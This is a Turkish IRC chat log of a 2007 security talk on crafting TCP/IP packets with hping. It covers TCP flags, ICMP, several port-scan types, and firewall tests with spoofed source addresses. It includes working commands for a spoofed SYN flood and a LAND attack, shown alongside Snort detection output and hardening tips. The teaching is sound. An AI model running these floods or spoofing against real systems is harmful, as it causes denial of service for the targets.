huzeyfe_onal3...[21:07-07/13]
huzeyfe_onal2...
huzeyfe_onal1
huzeyfe_onalHepiniz hosgeldiniz arkadaslar.
huzeyfe_onalOnce kisaca sunumun neler icerdiginden bahsedecegim
huzeyfe_onalsonra icerikteki konulara yavas yavas deginecegim.
huzeyfe_onalArada anlasilmayan yerler olursa sorularinizi alabiliriz ama
konu disi sorulariniza konuyu dagitmamak icin cevap
veremeyecegim.
huzeyfe_onalKonu: Hping ile TCP/IP Oyunlari
huzeyfe_onalKisaca kendimi tanitayim adet yerini bulsun.
huzeyfe_onalHuzeyfe ONAL/Istanbul/GSM Firmasinda bilgi guvenligi uzmani
olarak calisiyor/www.lifeoverip.net
huzeyfe_onalSunumu olusturmak icin neler kullandim[21:10-07/13]
huzeyfe_onalRedhat Linux
huzeyfe_onalHping3
huzeyfe_onaltcpdump/Wireshark
huzeyfe_onalSnort
huzeyfe_onalOpenBSD PF,  Windows XP
huzeyfe_onalHping Nedir?[21:11-07/13]
huzeyfe_onalbasitce tanimlayacak olursak : Hping, istenilen türde TCP/IP
paketleri oluşturmak için kullanılan harikulade bir araçtır
huzeyfe_onalbilindigi uzere internet denen ve bizimde hergun kullandigimiz
yapi tamamen TCP/IP uzerine bina edilmis.
----------------------------------------------------------------------------------------------
Soru:
aleelinux bilmeyenlerin durmasinda da yarar varmi
aleeyoksa bisi anlamazlar mi
c1982:)[21:13-07/13]
aleepardon ama sormaliyim
huzeyfe_onalLinux'dan bagimsiz.
-----------------------------------------------------------------------------------------------
huzeyfe_onal. Oluşturulacak paketlerde tüm alanları kendimize özgü
belirlenebilmesi, dinleme modu ile hostlara arası dosya
transferi ve komut çalıştırma özelliği(Truva ati?), IDS/IPS
testleri için özel veri alanı belirtilebilmesi(ids imzalarinin
testi) gibi ileri düzey özelliklere sahiptir.
huzeyfe_onalkisaca hping ile tcp/ip kullanan aglarda istedigimiz herseyi
yapabiliriz.[21:14-07/13]
huzeyfe_onalhatta TCP 'de veri aktarimi icin 3 lu el sıkısma gereklidir
gibi klasik sınırları da asacagız.
huzeyfe_onalNasıl Edinebilirim?
huzeyfe_onalLinux kullaniyorsaniz zaten bir sekilde nasil kuracaginizi
biliyorsunuzdur.
huzeyfe_onalwindows sistemeler icin sitesinden binary paketleri indirip
direkt komut satirindan calistirabilirsiniz.[21:15-07/13]
huzeyfe_onalhping'in arabirimi var midir?
huzeyfe_onalBenim bildigim yok, gerek de yok!
huzeyfe_onalzira amac tvp/ip yapisini daha iyi ogrenmek, tcp/ip uzerine
bina edilmis uygulamalari test etmek. Bu da oyle point &click
uygulamalar ile olmaz
huzeyfe_onalTemel Hping Kullanımı
huzeyfe_onalping denildiginde aklimiza icmp paketleri geliyor.
huzeyfe_onalOysa hping'in boyle bir kısıtlaması yok. Icmp paketleri
hping'in sadece bir kismini olusturuyor.
huzeyfe_onalHping kullanarak ilk paketimizi gönderelim.[21:17-07/13]
huzeyfe_onal# hping 192.168.1.1
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): NO FLAGS are set, 40
headers + 0 data bytes
huzeyfe_onalCtrl^C
huzeyfe_onal--- 192.168.1.1 hping statistic ---
huzeyfe_onal3 packets tramitted, 0 packets received, 100% packet loss
huzeyfe_onalround-trip min/avg/max = 0.0/0.0/0.0 ms
huzeyfe_onalpaket gönderdiğimiz sistemde tcpdump ile dinleyecek olursak su
paketleri goruruz.
huzeyfe_onalTcpdump Çıktısı
huzeyfe_onal# tcpdump -i eth0 -tttnn tcp port 0
huzeyfe_onal
huzeyfe_onalIP 192.168.1.5.1894 > 192.168.1.1.0: . win 512
huzeyfe_onalIP 192.168.1.5.1895 > 192.168.1.1.0: . win 512
huzeyfe_onalÖntanımlı  olarak hping icmp yerine TCP paketlerini
kullanır. Boş(herhangi bir bayrak set edilmemiş) bir tcp
paketini hedef sistemin 0 portuna gönderir.[21:18-07/13]
huzeyfe_onalböylece ilk paketimizi göndermiş olduk.
huzeyfe_onalTabi bu pakete cevap alabileceğiniz herhangi bir host yoktur.
huzeyfe_onalVarsayılan durumda hping TCP paketleri üretir fakat kabiliyeti
sadece bunla sınırlı değildir.[21:19-07/13]
huzeyfe_onalİstenirse tamamen özelleştirilebilen Raw IP paketleri, icmp ve
udp paketleri de oluşturulabilir.
huzeyfe_onalHping Çalışma Modları
huzeyfe_onalhping -0 /  --rawip  || Raw ip paketleri kullanmak için
huzeyfe_onalhping --rawip parametresi (ek parametrelerle desteklenmeli) ham
ip paketleri olusturur.
huzeyfe_onalne tur ip paketleri olusturulabilir?
huzeyfe_onalhttp://www.iana.org/assignments/protocol-numbers
huzeyfe_onaladresten alınacak protokl numaralari ile istenilen türde ip
paketi oluştuırabiliriz.
huzeyfe_onalDiger bir modda
huzeyfe_onal--icmp 'dir[21:21-07/13]
huzeyfe_onalhping ile ICMP paketleri ğretmek için kullanılır
huzeyfe_onal-2  --udp    UDP Paketleri oluşturmak için.
huzeyfe_onal-8  –scan    Klasik  Tarama  modu.
huzeyfe_onalport taramada daha sekilli cıktılar almak için --scan
parametresi ise yariyor.
huzeyfe_onalson bir mod daha kaldi sonra aksiyona gececegiz:)
huzeyfe_onal-9  –listen   Dinleme modu[21:22-07/13]
huzeyfe_onalGecenlerde netsec listesinde gecen 9 puanlik altin sorunun
cevabi bu parametrede yatiyor..
huzeyfe_onalTCP Paketleri ile Oynamak
huzeyfe_onalBir TCP paketinde hangi alanlar vardır, öncelikle buna biraz
değinelim sonra hping ile tcp başlığındaki alanlar ile
oynayarak neler yapabiliyoruz görelim.
--------------------------------------------------------------------------------------------------
Soru:
hasan_boluyorom ama buna neden ihtiyac duyulurki?
huzeyfe_onalneye?
huzeyfe_onal--listen mi?
hasan_paketlerle oynamaya
huzeyfe_onal:)
hasan_amac firewallı mı yanlıtmak
c1982:o) Doing! :D
huzeyfe_onalisiniz sadece router yonetmek , firewalla kural eklemek degilse
huzeyfe_onalara sira router/firewall/ips lerinizin gercekten denildigi gibi
calisip calismadigini kontrol edebilirsiniz.[21:24-07/13]
huzeyfe_onalTCP protokolunu detayli ogrenmek isteyebilirsiniz.
huzeyfe_onalkotu niyetli olabilirsiniz:D
QWERT123yihahaha :D
--------------------------------------------------------------------------------------------------
huzeyfe_onalTCP oturumunda en önemli bileşen bayrak(flags)lardır
huzeyfe_onalbayrak konusunu kavrayanin yolu duzdur:[21:25-07/13]
huzeyfe_onal Oturumun kurulması, veri aktarımı, bağlantının koparılması vb
gibi işlerin tamamı bu bayraklar aracılığı ile yapılır.
huzeyfe_onalİnceleyeceğimiz diğer protokollerde(IP, ICMP, UDP) bayrak
tanımı yoktur.
huzeyfe_onalhep duydugunuz tcp daha guvenirlidir sozu bu bayraklardan
gelir.[21:26-07/13]
huzeyfe_onalhemen klasik bir bilgi girelim araya:
huzeyfe_onalTCP oturumunda veri aktarımı için ne gereklidir?
huzeyfe_onalIki host arasinda veri aktarimi yapmak icin.
huzeyfe_onaloncelikle bu iki hostun ortak bazi paydalarda bulusmasi
gerekir.
huzeyfe_onalnedir bunlar.[21:27-07/13]
huzeyfe_onaltek sefer alabilecekleri veri miktari, sunucunun musait olup
olmadigi vs
huzeyfe_onal SYN -- SYN/ACK-- ACK paketleri
huzeyfe_onalile kurulan oturum sonrasi veri aktarimi guvenli olarak baslar.
[21:28-07/13]
huzeyfe_onalbiraz sonra bu bilginin eksik oldugunu gorecegiz:)
huzeyfe_onalHping ile oturumu kurmak icin gerekli olan SYN bayraklı bir
paket olusturalim.
huzeyfe_onal# hping -S 192.168.1.1[21:29-07/13]
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0
data bytes
huzeyfe_onallen=46 ip=192.168.1.1 ttl=255 DF id=0 sport=0 flags=RA seq=0
win=0 rtt=2.5 ms
huzeyfe_onalhedef sistemin 0. portuna SYN bayraklı bir paket gönderdik
huzeyfe_onalve cevap olarak RST/ACK paketi döndü
huzeyfe_onalbu nedir?
huzeyfe_onalkapalı bir porta gönderilen SYN paketine dönen cevap
[21:30-07/13]
huzeyfe_onalherhangi bir kapalı TCP portuna SYN bayraklı paket gönderirsek
bu cevabı alırız.
huzeyfe_onalhedef sistemde tcpdump calistiracak olursak donen paketi
görebiliriz
huzeyfe_onal# tcpdump -i eth0 -ttttnn tcp and host 192.168.1.1
huzeyfe_onal
huzeyfe_onal2007-07-05 19:44:30.096849 IP 192.168.1.4.2244 > 192.168.1.1.0:
S 2019758107:2019758107(0) win 512
huzeyfe_onalhping -c parametresi ile kullanılmazsa hping durdurulana
kadar(CTRL^c) paket göndermeye devam eder, –c ile kaç adet
paket göndereceği belirtilir.
huzeyfe_onalyani unutup giderseniz siz gelene kadar paket göndermeye devam
eder.
huzeyfe_onalRST Bayraklı TCP paketleri oluşturmak
huzeyfe_onal# hping -R -c 1 192.168.1.1[21:32-07/13]
huzeyfe_onalBenzer şekilde –R yerine diğer TCP bayrak tipleri konularak
istenilen türde TCP paketi oluşturulabilir.
huzeyfe_onalkac cesit bayrak vardır
huzeyfe_onal6+2
huzeyfe_onalHping'de Port Belirtimi
huzeyfe_onal-p parametresi kullanılarak hedef sisteme gönderilen paketlerin
hangi porta gideceği belirtilir. Default olarak bu değer 0 dır.
[21:33-07/13]
huzeyfe_onaloluşturulan paketlerde kaynak portu değiştirmek istersek
huzeyfe_onaleski stil calisan(non stateful) bazi cihazlari denetlemek icin
[21:34-07/13]
huzeyfe_onalkaynak ipyi bilindik bir port yapip paketleri gönderebiliriz.
huzeyfe_onal-s parametresi ile kaynak TCP portu değiştirilebilir. öntanımlı
olarak bu değer rastgele atanır.
huzeyfe_onalortaya karisik bir paket olusturup hedefe gönderelim.
huzeyfe_onal1000. porta RST, FIN, PUSH ve SYN bayrakları set edilmiş paket
gönderimi
huzeyfe_onalnasıl olsa engelleyen yok , bayraklar da ucretsiz:)
huzeyfe_onal# hping -RFSP -c 3 192.168.1.1 -p 1000[21:35-07/13]
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): RSFP set, 40 headers + 0
data bytes
huzeyfe_onalYine hedef sistemden donen cevaplari izleyecek olursak
huzeyfe_onal# tcpdump -i eth0 -ttttnn tcp port 1000 and host 192.168.1.1
huzeyfe_onal2007-07-05 19:54:19.670625 IP 192.168.1.4.2740 >
192.168.1.1.1000: SFRP 508587781:508587781(0) win 512
huzeyfe_onalHping taramalarının IDS'ler tarafından yakalanması.
huzeyfe_onalhping'in raw paketler olusturdugunu soylemistik.
huzeyfe_onalisletim sistemindeki uygulamaların olusturdugu paketler ile
tarama programlarının olusturdugu paketler farklı olabiliyor.
[21:37-07/13]
huzeyfe_onalHping taramalarının IDS'ler tarafından yakalanması. demistik.
huzeyfe_onalaslinda isini bilen birini yakalamasi oldukca guc
huzeyfe_onalama hping'i direkt kullanan birini IDS'ler cabuk yakalar
huzeyfe_onalICMP tarafina geciyorum[21:40-07/13]
huzeyfe_onalbiraz daha teorik bilgilerle devam edecegiz sonra surpriz
sanatcilari davet edecegim:D
huzeyfe_onalICMP Paketleri ile Oynamak
huzeyfe_onalicmp paketi olusturmak icin --icmp  kullaniyoruz.
huzeyfe_onalistenilen turde icmp paketi olusturabiliriz[21:41-07/13]
huzeyfe_onalicmp'de tcp/udp gibi port kavrami yok
huzeyfe_onalbunun yerine icmp type ve icmp code kavramlari var.
huzeyfe_onalKlasik ping paketi(icmp echo request) olusturalim.
huzeyfe_onal# hping --icmp 192.168.1.1 -c 1
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): icmp mode set, 28 headers
+ 0 data bytes
huzeyfe_onallen=46 ip=192.168.1.1 ttl=255 id=25683 icmp_seq=0 rtt=2.6 ms
huzeyfe_onalicmp type ve code degerleri o icmp paketinin ne ise yaradigini
belirtir[21:42-07/13]
huzeyfe_onalbazi icmp type'lari ek olarak code degerlerine de sahiptir.
huzeyfe_onalmesela  İcmp type 3 mesajı "Destination Unreachable" manasina
gelir[21:43-07/13]
huzeyfe_onalama burda bir eksiklik var
huzeyfe_onaldestination ne? unreachable ne?
huzeyfe_onalhedef sistem mi ulasilamaz , hedef port mu vs*
huzeyfe_onaliste burda icmp code degerleri devreye girerek tanimlari acik
hale getiriyor.
huzeyfe_onaleger code 0 ise
huzeyfe_onal  Net Unreachable
huzeyfe_onalcode 1 ise host ulasilamaz
huzeyfe_onalya da 3 ise port ulasilamaz manasina gelir.
huzeyfe_onalyukarıda port ulasılamazsa icmp paketi döner dedik?
huzeyfe_onalbu UDP protokolü için geçerlidir[21:46-07/13]
huzeyfe_onalUDP de bayrak tanımı olmadığı içim işlerini icmp'ye havale
eder.
huzeyfe_onalkisacasi kapali bir sisteme gonderilen udp paketi icmp ile
cevap doner.
huzeyfe_onalÖrnek:
huzeyfe_onalkapali oldugunu bildigimiz bir porta udp paketi gonderelim.
huzeyfe_onalve hedef sistemde firewall olmadigini varsayalim.
huzeyfe_onal# hping --udp 192.168.1.1 -p 9000 -n -c 1
huzeyfe_onalpaketimiz 9000 udp portuna gitti.
huzeyfe_onaltcpdump ile ilgili arabirimi dinleyecek olursak
huzeyfe_onal# tcpdump -i eth0 -ttttnn udp or icmp  and host 192.168.1.1
huzeyfe_onalasagidaki ciktiyi aliriz.[21:48-07/13]
huzeyfe_onal2007-07-05 20:15:49.368744 IP 192.168.1.4.2548 >
192.168.1.1.9000: UDP, length 0
huzeyfe_onal2007-07-05 20:15:49.369452 IP 192.168.1.1 > 192.168.1.4: ICMP
192.168.1.1 udp port 9000 unreachable, length 36
huzeyfe_onalhping ciktisi da benzer mesaji verecektir.
huzeyfe_onalhping-test ~ # hping --udp 192.168.1.1 -p 9000 -n
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): udp mode set, 28 headers
+ 0 data bytes
huzeyfe_onalICMP Port Unreachable from ip=192.168.1.1
huzeyfe_onalicmp ile ilgili olarak olusturulacak paketlerde[21:49-07/13]
huzeyfe_onaltype ve code değerleri belirlenebilir demiştik
huzeyfe_onalbunlari
huzeyfe_onal-C  / --icmptype type
huzeyfe_onalK /  --icmpcode code ile belirleyebiliriz.[21:50-07/13]
huzeyfe_onalmesela sahte icmp redirect mesaji olusturarak agda herhangi
birisinin gateway olarak sizi gormesi
huzeyfe_onalve sizin uzerinizde paketleri gondermesi saglanabilir
huzeyfe_onalama bu cok ayip bisi :)[21:51-07/13]
huzeyfe_onalPort Tarama aracı olarak Hpingü
huzeyfe_onalport tarama araclari ne yapar?
huzeyfe_onalcesitli turde tcp/udp/ip/icmp  paketleri olusturarak hedef
sistemlere gonderir ve gelen cevai yorumlarlar
huzeyfe_onalhping ile istedigimiz ozellikde paket olusturabildigimize gore
hpnig de bir port tarama aracidir diyebiliriz.
[21:52-07/13]
huzeyfe_onalhem de en alasindan :)
huzeyfe_onalPort Tarama aracı olarak Hping
huzeyfe_onalnmap kullananlar bilirler
huzeyfe_onalstandart kabul edilmis cesitli port tarama yontemleri vardir
huzeyfe_onalconnect scan
huzeyfe_onalstealth scan[21:53-07/13]
huzeyfe_onalxmas scan vs
huzeyfe_onalbunlarin hepsi paketlerle oynayarak yapilir.
huzeyfe_onalmesela yari acik tarama yapalim
huzeyfe_onal# hping -S   192.168.1.1 -p ++22
huzeyfe_onalHPING 192.168.1.1 (eth0 192.168.1.1): S set, 40 headers + 0
data bytes
huzeyfe_onallen=46 ip=192.168.1.1 ttl=64 DF id=0 sport=22 flags=SA seq=0
win=5840 rtt=6.2 ms
huzeyfe_onallen=46 ip=192.168.1.1 ttl=64 DF id=0 sport=23 flags=SA seq=1
win=5840 rtt=0.9 ms
huzeyfe_onallen=46 ip=192.168.1.1 ttl=255 DF id=0 sport=24 flags=RA seq=2
win=0 rtt=0.8 ms
huzeyfe_onalacik portlar icin SA, kapali portlar icin RA cevaplari dondu.
huzeyfe_onaldikkate değer bir parametrede ++ dir.[21:54-07/13]
huzeyfe_onal++port_numarasi kullanarak her seferinde port numarasının bir
artmasını sağladık
huzeyfe_onalBiraz detaya girelim.
huzeyfe_onalSYN Tarama İncelemesi
huzeyfe_onalI) Hping hedef sisteme SYN bayraklı paket gönderir.
huzeyfe_onalII) Hedef sistem SYN bayraklı paketi alır ve uygun TCP paketini
(SYN/ACK bayraklı ) cevap olarak döner.
huzeyfe_onalIII) Paket gönderen (hping çalıştıran )  taraftaki işletim
sistemi böyle bir paket beklemediği için dönen SYN/ACK bayraklı
TCP paketine RST cevabı döner.
huzeyfe_onalport taramalarda daha düzenli çıktı almak istenirse --scan
parametresi de kullanılabilir.[21:55-07/13]
huzeyfe_onalOyle ya bu sekilde hangi portun acik hangisinin kapali oldugunu
ekrani izleyerek anlamak sıkıcı olur
huzeyfe_onal# hping --scan  21,22,23,80,110,130-143  -S 194.27.72.88
huzeyfe_onal--scan ile tarama modunu aktif ettik
huzeyfe_onalsonuna da portlari istedigimiz gibi ekledik[21:56-07/13]
huzeyfe_onal23-30 demek
huzeyfe_onal23 ve 30 arasi.
huzeyfe_onalciktisi nasil olur?
huzeyfe_onalScanning 194.27.72.88 (194.27.72.88), port
21,22,23,80,110,130-143
huzeyfe_onal19 ports to scan, use -V to see all the replies
huzeyfe_onal+----+-----------+---------+---+-----+-----+-----+
huzeyfe_onal|port| serv name |  flags  |ttl| id  | win | len |
huzeyfe_onal+----+-----------+---------+---+-----+-----+-----+
huzeyfe_onal   21 ftp        : .S..A...  56 52428 65535    46
huzeyfe_onal   22 ssh        : .S..A...  56 52684 65535    46
huzeyfe_onal   80 http       : .S..A...  56 52940 65535    46
huzeyfe_onal  110 pop3       : .S..A...  56 53196 65535    46
huzeyfe_onalAll replies received. Done.
huzeyfe_onalNot responding ports: (130 cisco-fna) (131 cisco-tna) (132
cisco-sys) (133 statsrv) (134 ingres-net) (135 loc-srv) (136
profile) (137 netbios-ns) (138 netbios-dgm) (139 netbios-ssn)
(140 emfis-data) (141 emfis- cntl) (142 bl-idm) (143 imap)
huzeyfe_onaleh! biraz daha duzgun, en azindan hangi port acik hangisi
kapali ozet var.
huzeyfe_onalSYN Scan/FIN Scan/Null Scan/Xmas   Tarama Çeşitleri
[21:57-07/13]
huzeyfe_onalXmas Scan Örneği
huzeyfe_onalBu tarama tipinde amaç hedef sisteme FIN/URG/PSH bayrakları set
edilmiş TCP paketleri göndererek
huzeyfe_onalKapali sistemler için RST/ACK
huzeyfe_onalAçık sistemler için  cevap dönmemesini beklemektir.
huzeyfe_onalhping le bu tarama turunu gercekleyelim.[21:58-07/13]
huzeyfe_onal# hping -FUP 192.168.1.2 -p 90 -n -c 1
huzeyfe_onalHPING 192.168.1.2 (eth0 192.168.1.2): FPU set, 40 headers + 0
data bytes
huzeyfe_onallen=46 ip=192.168.1.2 ttl=222 id=37083 sport=90 flags=RA seq=0
win=0 rtt=5.3 ms
huzeyfe_onal--- 192.168.1.2 hping statistic ---
huzeyfe_onal1 packets tramitted, 1 packets received, 0% packet loss
huzeyfe_onalround-trip min/avg/max = 5.3/5.3/5.3 ms
huzeyfe_onalgoruldugu gibi kapali port icin RST/ACK dondu
huzeyfe_onalSorular varsa sorulari alip ikinci kisma geciyorum[21:59-07/13]
--------------------------------------------------------------------------------------------------
Soru:
erdemBrst/ack döndüğünü cevap gelmesinden mi anlıyoruz.
AliAkgunnetsec listesinde geçen 9 puanlýk sorunun cevabý 9 --listen modunda
yatýyor demiþtiniz. Soru nedir?[22:00-07/13]
huzeyfe_onal:) listenin gecmisine bakabilirsiniz.
AliAkgunok
huzeyfe_onalerdemB: kapali port icin RA cevabi donuyor.
huzeyfe_onalcevap gelmezse ya port aciktir ya da firewall engelliyordur.
[22:01-07/13]
--------------------------------------------------------------------------------------------------
Soru:
cybervolkanHocam Bolu'dan sevgiler... --scan ile port taramasını hangi
tarama tipi ile yapıyor? --scan anahtarına tarama tipi
belirtebiliyor muyuz?[22:03-07/13]
huzeyfe_onal--scan sadece ciktilari daha ozet bir sekilde veriyor.
[22:04-07/13]
QWERT123olur
huzeyfe_onalyani tarama turunu yine biz bayraklarla(TCP icin) belirliyoruz
huzeyfe_onalmesela FIN scan icin
huzeyfe_onalhping --scan -F hedef_sistem -p port_numarasi
huzeyfe_onaldiyebiliriz.
cybervolkanhmm anladım örnekteki -S anahtarını kaçırmışım teşekkürler
[22:05-07/13]
--------------------------------------------------------------------------------------------------
Soru:
erdemBnmapdan  farklı olarak sys scan/connect scan/xmas scan/null scan
buralarda ne gibi değişiklikler yapılır ve null scan ı
açıklayacakmısınız sonraki bölümde
huzeyfe_onalnull scan= bos bayrakli TCP paketleri
huzeyfe_onalhping'e hicbir parametre vermezseniz null scan yapar.
huzeyfe_onalhping hedef_sistem -p 80
huzeyfe_onalgibi.
huzeyfe_onalisimlere pek takilmamak lazim:)
huzeyfe_onalisterseniz sizde kendinize ozgu tarama tipleri olusturup isim
verebilirsiniz.[22:07-07/13]
--------------------------------------------------------------------------------------------------
huzeyfe_onalFirewall Testleri
huzeyfe_onalBir firewall neden test edilir? Daha dogrusu nesi test edilir?
huzeyfe_onalbir cirpida aklima gelenler
huzeyfe_onalip spoofing'e karsi onlem alinmis mi?
huzeyfe_onalyani spoof edilmis paketleri iletiyormu/geciriyor mu?
huzeyfe_onalperformansi nedir?
huzeyfe_onalkurallari gercekten yazildigi gibi isliyor mu[22:09-07/13]
huzeyfe_onalkendisine ait ne gibi bilgiler veriyor
huzeyfe_onalne zaman reboot edildigi, calistigi isletim sistemi, bulundugu
ag maskesi vs
huzeyfe_onalhping ile ip spoofing testleri yapmak icin -a parametresini
kullaniyoruz.
huzeyfe_onal -a --spoof hostname[22:10-07/13]
huzeyfe_onalonumuzde bir firewall var nat/routing  yapiyor.
huzeyfe_onalbiz firewallun disinda bir yere kaynak ip adresi spoof edilmis
paketler gonderiyoruz.
huzeyfe_onalbu paketler firewallu geciyorsa bir eksiklik var demektir.
[22:11-07/13]
huzeyfe_onal# hping -a 100.100.100.1 192.168.1.3 -S -p 80
huzeyfe_onalggibi.
huzeyfe_onaloldukca masum gorunen bu istek biraz daha gelistirilirse
huzeyfe_onalcok can yakabilir nasil mi? [22:12-07/13]
huzeyfe_onalhping'in sagladigi random kaynak ip /hedef ip olusturma
ozelligi ile
huzeyfe_onalrandom kaynak ip olusturmak icin: --rand-source
huzeyfe_onalrandom hedef ip olusturmak icin --rand-dest
huzeyfe_onalmesela hping ile syn flood denemesi yapalim.[22:13-07/13]
huzeyfe_onalarada sorular varsa teker teker alabiliriz.
huzeyfe_onalne demistik SYN Flood olusturabiliriz
huzeyfe_onalsyn flood'da amac nedir?
--------------------------------------------------------------------------------------------------
Soru:
Crone-a dest ip midir
huzeyfe_onal-a kaynak ip
huzeyfe_onalhedef ip icin birsey belirtmiyoruz.[22:14-07/13]
Crone1.3?
aleespoof ediyo
huzeyfe_onalkaynak ip adresini 100.100.100.1 olarak set ettik
huzeyfe_onalhedef ip adresi de 192.... li olan
Croneok. got it..
Cronego on...
--------------------------------------------------------------------------------------------------
huzeyfe_onalSyn flood'da /bir nevi D/DOS) saldırılarında amaç olabildiğince
fazla sayıda ve olabildiğince farklı kaynaktan hedef sisteme
paketler göndererek kapasitesini doldurmasını ve yeni bağlantı
kabul etmemesini sağlamaktır[22:15-07/13]
huzeyfe_onalatiyorum hedef sistemin es zamanli paket tutma sayisi 10000
olsun.
huzeyfe_onalben her biri farkli iplerden geliyormus gibi bu kadar paketi
sisteme gonderirsem hedef sapitir ve yeni baglanti kabul etmez
[22:16-07/13]
huzeyfe_onaluzerinde ids/ips/idp ne calisirsa calissin cok fazla
yapabilecegi birsey yoktur.
huzeyfe_onalZira kimi yasaklayacak?
huzeyfe_onaltum ipler spoof edilmis.
huzeyfe_onalflood icin kullanilan diger bir protokolde udp die
huzeyfe_onaldir.
huzeyfe_onalona sonra gelecegiz.[22:17-07/13]
huzeyfe_onalbasit bir syn flood yapalim.
huzeyfe_onal# hping -S --rand-source 192.168.1.3 -p 445  -I eth0 --flood
huzeyfe_onalhedef sistemimiz 445. portu acik bir windows.
huzeyfe_onalbiraz bekleyelim
huzeyfe_onalhattan dusersem bilinki sistemim cakildi:D
huzeyfe_onalHPING 192.168.1.3 (eth0 192.168.1.3): S set, 40 headers + 0
data bytes
huzeyfe_onalhping in flood mode, no replies will be shown
huzeyfe_onalevet %12 lerdeki cpu oranim[22:19-07/13]
huzeyfe_onaloldu %60
huzeyfe_onalbiraz daha zorlarsam ya da bir makine ile daha yaparsam tamamen
gidecek.
huzeyfe_onalayni komutu Linux sistemlere yapacak olursak cpu orani %20leri
asmayacaktir bu ornek icin.
huzeyfe_onalhafta sonu guvenlik egitimlerinde test edip onaylanmistir:)
--------------------------------------------------------------------------------------------------
Soru:
hasan_sebep?
huzeyfe_onalsebep
huzeyfe_onalLinux/UNIX sistemlerin default olarak syn_flood'a karsi
korumali gelmesi.
huzeyfe_onalWindows sistemlerde bu sonradan yapilandirilabiliyor.
huzeyfe_onalhttp://blog.lifeoverip.net/index.php/2007/07/09/windows-sistemlere-guvenlik-dopingi/
huzeyfe_onaladresinde Windows sistemleri daha sıkı hale getirmek icin mini
tavsiyeler var
--------------------------------------------------------------------------------------------------
Soru:
erdemBspoof u biraz açıklaya bilirmisiz(kaynağı nerden buluyoruz veya nasl
spoof yapıyoruz)
huzeyfe_onalspoof paketler nasil olusturulu?[22:21-07/13]
huzeyfe_onaldetayini netten bakalim, detaya girersek zaman alacak.
--------------------------------------------------------------------------------------------------
huzeyfe_onalLAND Atağı
huzeyfe_onalLAND atağında amaç  hedef sisteme kendi ip adresinden
geliyormış gibi paketler göndererek kısır döngüye girmesini
sağlamaktır. WinNT sistemlerde oldukça başarılı olan bu atak
türü günümüzdeki çoğu sistemde çalışmaz.
huzeyfe_onalbu arada ne kadar hizli yazdigimida gormus oldunuz:D
huzeyfe_onalAtağın nasıl çalıştığını daha iyi anlamak ve izlemek için hping
ile aşağıdaki komutu çalıştırıp Windows sistemde durumu
izleyin.
huzeyfe_onal#hping -a  192.168.1.4 192.168.1.4 -S -p 22 --flood
huzeyfe_onalHPING 192.168.1.4 (eth0 192.168.1.4): S set, 40 headers + 0
data bytes[22:22-07/13]
huzeyfe_onal--- 192.168.1.4 hping statistic ---
huzeyfe_onal10 packets tramitted, 0 packets received, 100% packet loss
huzeyfe_onalround-trip min/avg/max = 0.0/0.0/0.0 ms
huzeyfe_onalartik cogu sistemde bu atak yemiyor
huzeyfe_onalpeki bu atağı bir IDS(saldiri tespit sistemine) yaparsak  bize
ne der?
huzeyfe_onaltail -f /var/log/snort/alert
huzeyfe_onal[**] [116:151:1] (snort decoder) Bad Traffic Same Src/Dst IP
[**]
huzeyfe_onal07/12-20:14:52.750771 192.168.1.4:2587 -> 192.168.1.4:22
huzeyfe_onalTCP TTL:64 TOS:0x0 ID:56230 IpLen:20 DgmLen:40
huzeyfe_onal******S* Seq: 0x781CB8BE  Ack: 0x5ACC9778  Win: 0x200  TcpLen:
20
huzeyfe_onal[**] [1:527:8] BAD-TRAFFIC same SRC/DST [**]
huzeyfe_onal[Classification: Potentially Bad Traffic] [Priority: 2]
huzeyfe_onal07/12-20:14:52.750771 192.168.1.4:2587 -> 192.168.1.4:22
huzeyfe_onalTCP TTL:64 TOS:0x0 ID:56230 IpLen:20 DgmLen:40
huzeyfe_onal******S* Seq: 0x781CB8BE  Ack: 0x5ACC9778  Win: 0x200  TcpLen:
20
huzeyfe_onal[Xref => http://www.cert.org/advisories/CA-1997-28.html][Xref
=>
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0016][Xref
=> http://www.securityfocus.com/bid/2666]
huzeyfe_onalhemen tanidi!
huzeyfe_onal BAD-TRAFFIC same SRC/DST kismina dikkat.[22:23-07/13]
huzeyfe_onalHedef Sistemler Hakkında Bilgi Edinmek
huzeyfe_onalilk örnek uptime süresi
huzeyfe_onalHedef Sistemin Uptime Süresi Belirleme
huzeyfe_onal# hping3 -S --tcp-timestamp -p 80 -c 2 194.27.72.88
[22:24-07/13]
huzeyfe_onalHPING 194.27.72.88 (eth0 194.27.72.88): S set, 40 headers + 0
data bytes
huzeyfe_onallen=56 ip=194.27.72.88 ttl=56 DF id=28012 sport=80 flags=SA
seq=0 win=65535 rtt=104.5 ms
huzeyfe_onal  TCP timestamp: tcpts=55281816
huzeyfe_onallen=56 ip=194.27.72.88 ttl=56 DF id=28013 sport=80 flags=SA
seq=1 win=65535 rtt=99.1 ms
huzeyfe_onal  TCP timestamp: tcpts=55281917
huzeyfe_onal  HZ seems hz=100
huzeyfe_onal  System uptime seems: 6 days, 9 hours, 33 minutes, 39 seconds
huzeyfe_onal System uptime seems: 6 days, 9 hours, 33 minutes, 39 seconds
--------------------------------------------------------------------------------------------------
Soru:
aleeneden hedef sistemin uptime bilgisine erismek isteriz ki?
huzeyfe_onal:) bilmem . Mesela kotu adam bir yere saldirmistir
huzeyfe_onalsaldirisinin basariya ulasip sistemin coktugunu anlamak icin
boyle bisiler gonderebilir[22:25-07/13]
aleeooo evet super
huzeyfe_onalcok daha farkli amaclar icin de kullanilabilir
--------------------------------------------------------------------------------------------------
huzeyfe_onalek not:
huzeyfe_onalWindows XP SP2’lerle birlikte güvenlik amaçlı* timestamp
sorgularına cevap dönmez.
huzeyfe_onal:)
--------------------------------------------------------------------------------------------------
Soru:
talkieeeerisimi nasil engelleyebiliriz? baskasi gormesin?
huzeyfe_onalCisco Routerlarda timestamp’i aşağıdaki şekilde aktif/pasif
hale getirebiliriz
huzeyfe_onalip tcp timestamp     -> aktif hale getirmek için
huzeyfe_onalno ip tcp timestamp de tam tersi icin.
huzeyfe_onalLinux icin
huzeyfe_onal# sysctl -a|grep timestamp
huzeyfe_onalnet.ipv4.tcp_timestamps = 1
talkieeeha saol
talkieeebu netcraft filan ordanmi goruyor
